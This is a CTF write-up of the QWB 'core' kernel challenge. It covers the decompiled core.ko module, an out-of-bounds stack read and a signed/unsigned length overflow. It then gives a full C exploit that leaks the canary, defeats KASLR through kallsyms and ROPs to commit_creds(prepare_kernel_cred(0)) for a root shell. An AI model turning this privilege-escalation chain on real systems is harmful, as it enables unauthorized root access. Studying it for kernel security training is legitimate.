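Line 9 saves the contents of /proc/kallsyms to /tmp/kallsyms, so the addresses of commit_creds and prepare_kernel_cred can be read from /tmp/kallsyms;
Line 10 sets kptr_restrict to 1, which hides function addresses in /proc/kallsyms from unprivileged users, but the information was already saved to a readable file;
Line 11 sets dmesg_restrict to 1, which stops unprivileged users from using dmesg;
Line 18 schedules a timed power-off. To keep it from getting in the way while working on the challenge, delete that line and repack.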

$ file core.cpio
core.cpio: gzip compressed data, last modified: Fri Oct  5 14:08:36 2018, max compression, from Unix
$ mv core.cpio core.cpio.gz
$ gunzip ./core.cpio.gz
$ ls
core.cpio
$ file ./core.cpio
./core.cpio: ASCII cpio archive (SVR4 with no CRC)
$ cpio -idmv < ./core.cpio
.
usr
usr/sbin
...
init
etc
etc/group
etc/passwd
lib64
lib64/ld-linux-x86-64.so.2
lib64/libc.so.6
lib64/libm.so.6
...
gen_cpio.sh
bin
...
vmlinux
root
linuxrc
lib
lib/modules
...
tmp
core.cpio
core.ko
129851 blocks
$ bat init
───────┬────────────────────────────────────────────────────────────────────────
       │ File: init
───────┼────────────────────────────────────────────────────────────────────────
   1   │ #!/bin/sh
   2   │ mount -t proc proc /proc
   3   │ mount -t sysfs sysfs /sys
   4   │ mount -t devtmpfs none /dev
   5   │ /sbin/mdev -s
   6   │ mkdir -p /dev/pts
   7   │ mount -vt devpts -o gid=4,mode=620 none /dev/pts
   8   │ chmod 666 /dev/ptmx
   9   │ cat /proc/kallsyms > /tmp/kallsyms
  10   │ echo 1 > /proc/sys/kernel/kptr_restrict
  11   │ echo 1 > /proc/sys/kernel/dmesg_restrict
  12   │ ifconfig eth0 up
  13   │ udhcpc -i eth0
  14   │ ifconfig eth0 10.0.2.15 netmask 255.255.255.0
  15   │ route add default gw 10.0.2.2
  16   │ insmod /core.ko
  17   │
  18   │ poweroff -d 120 -f &
  19   │ setsid /bin/cttyhack setuidgid 1000 /bin/sh
  20   │ echo 'sh end!\n'
  21   │ umount /proc
  22   │ umount /sys
  23   │
  24   │ poweroff -d 0  -f
───────┴────────────────────────────────────────────────────────────────────────

gen_cpio.sh can be used to repack;

If it fails to boot, raise QEMU's memory setting to 128M.

Next, analyze the module file. Canary and NX are enabled:

$ file ./core.ko
./core.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=54943668385c6573ec1b40a7c06127d9423103b3, not stripped
$ checksec ./core.ko
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

The module entry point registers /proc/core:

__int64 init_module()
{
  core_proc = proc_create("core", 438LL, 0LL, &core_fops);
  printk(&unk_2DE);
  return 0LL;
}

The exit function removes /proc/core:

__int64 exit_core()
{
  __int64 result; // rax

  if ( core_proc )
    result = remove_proc_entry("core");
  return result;
}

core_ioctl contains a switch statement whose cases call core_read, set the global variable off, and call core_copy_func:

__int64 __fastcall core_ioctl(__int64 a1, int c, __int64 data_1)
{
  __int64 data; // rbx

  data = data_1;
  switch ( c )
  {
    case 0x6677889B:
      core_read(data_1);
      break;
    case 0x6677889C:
      printk(&unk_2CD);
      off = data;
      break;
    case 0x6677889A:
      printk(&unk_2B3);
      core_copy_func(data);
      break;
  }
  return 0LL;
}

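core_read copies 0x40 bytes starting at v5 + off to user space. Since off is under our control, this reads kernel stack memory at a chosen offset from the buffer: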

unsigned __int64 __fastcall core_read(__int64 a1)
{
  __int64 v1; // rbx
  char *v2; // rdi
  signed __int64 i; // rcx
  unsigned __int64 result; // rax
  char v5; // [rsp+0h] [rbp-50h]
  unsigned __int64 v6; // [rsp+40h] [rbp-10h]

  v1 = a1;
  v6 = __readgsqword(0x28u);
  printk(&unk_25B);
  printk(&unk_275);
  v2 = &v5;
  for ( i = 0x10LL; i; --i )
  {
    *(_DWORD *)v2 = 0; // the loop zeroes the 0x40-byte buffer v5
    v2 += 4;
  }
  strcpy(&v5, "Welcome to the QWB CTF challenge.\n");
  result = copy_to_user(v1, &v5 + off, 0x40LL);
  if ( !result )
    return __readgsqword(0x28u) ^ v6;
  __asm { swapgs }
  return result;
}
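
IDA places the buffer at rbp-0x50 and the canary at rbp-0x10, so an off of 0x40 makes the copy start exactly at the canary. The sketch below models that frame in userland; frame_model and leak_qword are illustrative names, and the struct is a simplification of the real stack frame.

```c
#include <stdint.h>
#include <string.h>

/* Simplified model of core_read's frame: a 0x40-byte buffer followed
 * directly by the stack canary. */
struct frame_model {
    char     buf[0x40];
    uint64_t canary;
};

/* Return the 8 bytes found at buf + off, i.e. the first qword that a
 * copy starting at &v5 + off would hand back. The caller must keep
 * off + 8 within the model. */
static uint64_t leak_qword(const struct frame_model *f, size_t off)
{
    uint64_t out;
    memcpy(&out, (const char *)f + off, sizeof out);
    return out;
}
```

With off set to 0x40, the first qword of the data returned to user space is the canary.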

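core_copy_func copies a given number of bytes from the global variable name into the local buffer buf. The length passed in is a signed 64-bit integer (signed __int64), while qmemcpy uses it truncated to an unsigned 16-bit integer (unsigned __int16). A negative value therefore passes the len > 0x3F check, and its low 16 bits still give a copy length large enough to overflow buf: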

signed __int64 __fastcall core_copy_func(signed __int64 len)
{
  signed __int64 result; // rax
  __int64 buf; // [rsp+0h] [rbp-50h]
  unsigned __int64 v3; // [rsp+40h] [rbp-10h]

  v3 = __readgsqword(0x28u);
  printk(&unk_215);
  if ( len > 0x3F )
  {
    printk(&unk_2A1);
    result = 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(&buf, &name, (unsigned __int16)len);
  }
  return result;
}
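
The mismatch between the signed check and the 16-bit cast can be reproduced in a few lines. This is a userland sketch of the two expressions only; the function names are made up.

```c
#include <stdbool.h>
#include <stdint.h>

/* Mirrors the signed comparison: only len > 0x3F is rejected. */
static bool passes_length_check(int64_t len)
{
    return !(len > 0x3F);
}

/* Mirrors the (unsigned __int16) cast applied to the copy length. */
static uint16_t effective_copy_length(int64_t len)
{
    return (uint16_t)len;
}
```

For example, 0xffffffffffff0100 is negative as a signed 64-bit value, so it passes the check, yet the length actually copied is 0x100 bytes.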

core_write writes caller-supplied data into the global variable name:

signed __int64 __fastcall core_write(__int64 a1, __int64 buf, unsigned __int64 a3)
{
  unsigned __int64 len; // rbx

  len = a3;
  printk(&unk_215);
  if ( len <= 0x800 && !copy_from_user(&name, buf, len) )
    return (unsigned int)len;
  printk(&unk_230);
  return 0xFFFFFFF2LL;
}

Finally, core_release only does a printk:

__int64 core_release()
{
  printk(&unk_204);
  return 0LL;
}

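Putting this together: we can read the kernel stack at a chosen offset, write to a global variable, and overflow a local variable in a function, which suggests the following ROP plan:

Use ioctl to set the global variable off, then call core_read to leak the canary;
Use core_write to write the ROP chain into name (building commit_creds(prepare_kernel_cred(0)), with the addresses taken from /tmp/kallsyms);
Use core_copy_func to copy the ROP chain from name onto the local variable;
Finally return to user mode and call system("/bin/sh") (the swapgs ; iretq instructions restore the registers and return to user mode).

As for finding gadgets, M4x uses ropper, but ROPgadget feels faster to me.
$ ROPgadget --binary ./vmlinux > gadgets
iretq can be found with objdump.

Exploit: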
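
Because kaslr is enabled, gadget addresses taken from the static vmlinux have to be shifted by the difference between the runtime base and the link-time base. Here is a minimal sketch of that arithmetic; the helper names are mine, and the leaked address used in the note below is a made-up sample, not a value from a real run.

```c
#include <stdint.h>

#define RAW_VMLINUX_BASE 0xffffffff81000000ULL /* base of the unrandomized vmlinux */

/* Runtime kernel base, from one leaked symbol address and that
 * symbol's offset from the base in the static vmlinux. */
static uint64_t kernel_base(uint64_t leaked, uint64_t symbol_offset)
{
    return leaked - symbol_offset;
}

/* Shift an address taken from the static vmlinux to its runtime location. */
static uint64_t rebase(uint64_t raw_addr, uint64_t runtime_base)
{
    return raw_addr - RAW_VMLINUX_BASE + runtime_base;
}
```

If commit_creds (offset 0x9c8e0 in this kernel) were leaked at 0xffffffff9a29c8e0, the base would be 0xffffffff9a200000 and the gadget at 0xffffffff81000b2f would move to 0xffffffff9a200b2f.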

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

void spawn_shell() {
  if (!getuid()) {
        system("/bin/sh");
        exit(0);
    } else {
        puts("[!] UID != 0");
        exit(-1);
    }
}

size_t commit_creds, prepare_kernel_cred;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;

size_t find_symbols() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd == NULL) {
        puts("[!] Open /tmp/kallsyms error...");
        exit(-1);
    }

    char buf[0x30];
    while (fgets(buf, 0x30, kallsyms_fd)) {
        if (commit_creds && prepare_kernel_cred)
            break;

        if (strstr(buf, "commit_creds") && !commit_creds) {
            char hex[20] = {0}; // zero-filled so the 16 copied digits stay NUL-terminated
            strncpy(hex, buf, 16);
            sscanf(hex, "%zx", &commit_creds);
            printf("commit_creds => %p.\n", (void *)commit_creds);
            vmlinux_base = commit_creds - 0x9c8e0;
            printf("vmlinux_base => %p.\n", (void *)vmlinux_base);
        }

        if (strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred) {
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%zx", &prepare_kernel_cred);
            printf("prepare_kernel_cred => %p.\n", (void *)prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - 0x9cce0;
            printf("vmlinux_base => %p.\n", (void *)vmlinux_base);
        }
    }
    fclose(kallsyms_fd);

    if (!(prepare_kernel_cred && commit_creds)) {
        puts("[*] Error...");
        exit(-1);
    }
    return 0;
}

size_t user_cs, user_ss, user_rflags, user_sp;

// The inline assembly uses Intel syntax, so build with -masm=intel.
void save_status() {
    __asm__(
        "mov user_cs, cs;\n"
        "mov user_ss, ss;\n"
        "mov user_sp, rsp;\n"
        "pushf;"
        "pop user_rflags;\n"
    );
    puts("[*] User status has been saved.");
}

void set_off(int fd, long long idx) {
    printf("[*] Set off = %lld.\n", idx);
    ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf) {
    puts("[*] Read to buf!");
    ioctl(fd, 0x6677889B, buf);
}

void core_copy_func(int fd, long long size) {
    printf("[*] Copy %lld byte(s) from user.\n", size);
    ioctl(fd, 0x6677889A, size);
}

uint64_t pop_rdi_ret = 0xffffffff81000b2f;
uint64_t pop_rdx_ret = 0xffffffff810a0f49;
uint64_t pop_rcx_ret = 0xffffffff81021e53;
uint64_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
uint64_t swapgs_popfq_ret = 0xffffffff81a012da;
uint64_t iretq_ret = 0xffffffff81050ac2;

int main() {
    save_status();
    int fd = open("/proc/core", 2);
    if(fd < 0) {
        puts("[*] Open /proc/core error...");
        exit(-1);
    }

    find_symbols();
    // gadget = raw_gadget - raw_vmlinux_base + vmlinux_base;
    ssize_t offset = vmlinux_base - raw_vmlinux_base;

    set_off(fd, 0x40);
    char buf[0x40];
    core_read(fd, buf);
    size_t canary = ((size_t *)buf)[0];
    printf("[+] Canary = %p\n", canary);

    size_t rop[0x1000] = {0};

    int i;
    for (i = 0; i < 10; i++)
        rop[i] = canary;
    // prepare_kernel_cred(0)
    rop[i++] = pop_rdi_ret + offset;
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred;

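    // commit_creds(prepare_kernel_cred(0)):
    // rdx points at "pop rcx ; ret", so "call rdx" lands on a gadget that pops
    // the return address pushed by the call and then returns into commit_creds,
    // with rdi already holding the cred returned in rax.
    rop[i++] = pop_rdx_ret + offset; // pop rdx ; ret
    rop[i++] = pop_rcx_ret + offset; // pop rcx ; ret
    rop[i++] = mov_rdi_rax_call_rdx + offset; // mov rdi, rax ; call rdx
    rop[i++] = commit_creds;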

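    // Return to user mode: swapgs restores the user GS base, popfq consumes
    // the dummy 0 below, and iretq pops rip, cs, rflags, rsp, ss in that order.
    rop[i++] = swapgs_popfq_ret + offset;
    rop[i++] = 0;

    rop[i++] = iretq_ret + offset;

    rop[i++] = (size_t)spawn_shell; // rip

    rop[i++] = user_cs;     // cs
    rop[i++] = user_rflags; // rflags
    rop[i++] = user_sp;     // rsp
    rop[i++] = user_ss;     // ss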

    write(fd, rop, 0x800); // Write rop chain
    core_copy_func(fd, 0xffffffffffff0000 | (0x100));
    return 0;
}

Debug with gdb

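To debug, you generally first add the -gdb tcp::1234 option (or its shorthand, -s) to the QEMU launch script. Then start GDB with gdb ./vmlinux (if you do not have vmlinux, extract it from the kernel image beforehand). Next, load the module's symbols in gdb: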

add-symbol-file /path/to/lkms/example.ko [offset]

The offset is the module's load address, which you can get by running lsmod inside QEMU:
/ $ lsmod
core 16384 0 - Live 0xffffffffc0211000 (O)
Alternatively, modify the boot script to get a root shell and read the address of the .text section from /sys/module/core/sections/.text:
/ # cat /sys/module/core/sections/.text
0xffffffffc0211000

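Then run target remote localhost:1234 to start debugging. The module address in the session below differs from the lsmod output above, presumably because it was captured on a different boot: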

$ gdb ./vmlinux -q
GEF for linux ready, type `gef' to start, `gef config' to configure
80 commands loaded for GDB 7.11.1 using Python engine 3.5
Reading symbols from ./vmlinux...(no debugging symbols found)...done.
gef➤  add-symbol-file fs/core.ko 0xffffffffc027a000
add symbol table from file "fs/core.ko" at
    .text_addr = 0xffffffffc027a000
Reading symbols from fs/core.ko...(no debugging symbols found)...done.
gef➤  b core_read
Breakpoint 1 at 0xffffffffc027a063
gef➤  target remote localhost:1234
Remote debugging using localhost:1234
0xffffffffa6a6e7d2 in ?? ()

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────── registers ────
$rax   : 0xffffffffa6a6e7d0  →  0x2e66001f0fc3f4fb  →  0x2e66001f0fc3f4fb
$rbx   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$rcx   : 0x0000000000000000  →  0x0000000000000000
$rdx   : 0x0000000000000000  →  0x0000000000000000
$rsp   : 0xffffffffa7403eb8  →   movabs al, ds:0xc2ffffffffa62b65
$rbp   : 0x0000000000000000  →  0x0000000000000000
$rsi   : 0x0000000000000000  →  0x0000000000000000
$rdi   : 0x0000000000000000  →  0x0000000000000000
$rip   : 0xffffffffa6a6e7d2  →  0x1f0f2e66001f0fc3  →  0x1f0f2e66001f0fc3
$r8    : 0xffff8d484641bf20  →   (bad)
$r9    : 0x0000000000000000  →  0x0000000000000000
$r10   : 0x0000000000000000  →  0x0000000000000000
$r11   : 0x000000000000018c  →  0x000000000000018c
$r12   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$r13   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$r14   : 0x0000000000000000  →  0x0000000000000000
$r15   : 0x0000000000000000  →  0x0000000000000000
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────── stack ────
[!] Unmapped address
─────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffffa6a6e7cf                  nop
   0xffffffffa6a6e7d0                  sti
   0xffffffffa6a6e7d1                  hlt
   0xffffffffa6a6e7d2                  ret
   0xffffffffa6a6e7d3                  nop    DWORD PTR [rax]
   0xffffffffa6a6e7d6                  nop    WORD PTR cs:[rax+rax*1+0x0]
   0xffffffffa6a6e7e0                  mov    rax, QWORD PTR gs:0x14d40
   0xffffffffa6a6e7e9                  or     BYTE PTR ds:[rax+0x2], 0x20
   0xffffffffa6a6e7ee                  mov    rdx, QWORD PTR [rax]
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffffa6a6e7d2 in ?? (), reason: SIGTRAP
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffffa6a6e7d2 → ret
[#1] 0xffffffffa62b65a0 → jmp 0xffffffffa62b6541
[#2] 0xc2 → irq_stack_union()
[#3] 0xffffffffa78c4900 → int3
[#4] 0xffff8d48466d4900 → jb 0xffff8d48466d4971
[#5] 0xffffffffa78cc2c0 → int3
────────────────────────────────────────────────────────────────────────────────
gef➤

References

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge-zh/
http://m4x.fun/post/linux-kernel-pwn-abc-1/
https://richardustc.github.io/2013-05-21-2013-05-21-min-mmap-addr.html
https://blog.csdn.net/jhyboss/article/details/76505873
https://www.cnblogs.com/skywang12345/archive/2013/05/15/driver_class.html
https://www.anquanke.com/post/id/86490
https://blog.csdn.net/m0_38100569/article/details/100673103
http://eternalsakura13.com/2018/03/31/b_core/


